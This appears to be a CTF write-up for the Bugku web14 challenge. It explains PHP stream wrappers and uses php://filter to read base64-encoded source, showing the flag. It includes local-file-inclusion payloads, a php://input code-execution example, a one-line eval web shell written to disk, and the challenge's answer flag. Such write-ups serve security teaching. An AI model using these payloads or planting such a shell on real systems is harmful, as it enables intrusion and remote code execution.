Bugku CTF web14（Web）

0. Open the webpage and click the click me? no link

The URL bar shows: http://114.67.246.176:15077/index.php?file=show.php , there may be a file inclusion vulnerability

这里介绍一下：php:// protocol

• condition:

  • allow_url_fopen:off/on
  • allow_url_include :Only php://input php://stdin php://memory php://temp need to be on
• Action:
  php:// accessing the respective input / output streams (I / O streams), often used in the CTF is php://filterand php://input, php://filterfor reading the source code, php://inputfor performing php code.

• Description:
  PHP provides some miscellaneous input/output (IO) streams, allowing access to PHP's input and output streams, standard input and output and error descriptors,
  temporary file streams in memory, disk backup, and other read and write file resources that can be manipulated Filter.

  protocol	effect
  php://input	You can access the read-only stream of the original data of the request. Accessing the POST datapart in the POST request is invalid at enctype="multipart/form-data" the time php://input .
  php://output	The write-only data stream allows writing to the output buffer in the same way as print and echo.
  php://fd	(>=5.3.6) Allow direct access to the specified file descriptor. For example,  php://fd/3 file descriptor 3 is referenced.
  php://memory php://temp	(>=5.1.0) A data stream similar to a file wrapper, allowing temporary data to be read and written. The only difference between the two is that php://memory the data is  always stored in the memory, but php://temp will be 2MBstored in a temporary file after the amount of memory  reaches a predefined limit (the default is  ). The location of temporary files is determined  sys_get_temp_dir() in the same way.
  php://filter	(>=5.0.0) A meta-wrapper designed for filtering applications when the data stream is opened. It is （all-in-one）very useful for all- in- one file functions, similar to  readfile(), file() and  file_get_contents(), there is no chance to apply other filters before the data stream content is read.

• php://filterDetailed parameter

  The parameters of the protocol will be passed on the path of the protocol, and multiple parameters can be passed on the same path. The specific reference is as follows:

  php://filter parameters	description
  resource=<data stream to be filtered>	Required item. It specifies the data stream you want to filter.
  read=<filter for reading chain>	Optional. One or more filter names can be set, with a pipe character (*\	*) separated.
  write=<write chain filter>	Optional. One or more filter names can be set, with a pipe character (\	) Separated.
  <; filter for two chains>	Any  filter list that is not prefixed with  read=  or  write= will be applied to the read or write chain as appropriate.

• List of available filters (4 categories)

  The main filter types are listed here. For details, please refer to: https://www.php.net/manual/zh/filters.php

  String filter	effect
  string.rot13	Equivalent to str_rot13()rot13 transform
  string.toupper	Equivalent to strtoupper(), turn capital letters
  string.tolower	Equivalent to strtolower(), turn lowercase letters
  string.strip_tags	Equivalent to strip_tags()removing html and PHP language tags

  Conversion filter	effect
  convert.base64-encode & convert.base64-decode	Equivalent to base64_encode()sum base64_decode(), base64 encoding and decoding
  convert.quoted-printable-encode & convert.quoted-printable-decode	Encoding and decoding of quoted-printable strings and 8-bit strings

  Compression filter	effect
  zlib.deflate & zlib.inflate	A method of creating gzip-compatible files in the local file system, but does not generate header and trailer information for command-line tools such as gzip. Just compress and decompress the payload part of the data stream.
  bzip2.compress & bzip2.decompress	Same as above, the method of creating bz2 compatible files in the local file system.

  Encryption filter	effect
  mcrypt.*	libmcrypt symmetric encryption algorithm
  mdecrypt. *	libmcrypt symmetric decryption algorithm

• Example:

  1. php://filter/read=convert.base64-encode/resource=[文件名]Read the file source code (base64 encoding is required for php files)

     http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php

     

  2. php://input + [POST DATA]Execute php code

     http://127.0.0.1/include.php?file=php://input
     [POST DATA部分]
     <?php phpinfo(); ?>

     

     If you have write permission, write a sentence of Trojan horse

     http://127.0.0.1/include.php?file=php://input
     [POST DATA部分]
     <?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>

     

1、构造payload：http://114.67.246.176:15077/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

77u/PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LXdlYjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFnezU4ZGU2MTg1ODMxNDNiMzA4ZDZjMDc5YjQ5MDhlYTc3fQ0KPz4NCjwvaHRtbD4NCg==

相当于得到了源代码进行base64编码之后的结果，只需进行base64解码即可获取源代码

2、进行base64解码

<html>
    <title>Bugku-web</title>
    
<?php
    error_reporting(0);
    if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag:flag{58de618583143b308d6c079b4908ea77}
?>
</html>

3、得到flag：flag{58de618583143b308d6c079b4908ea77}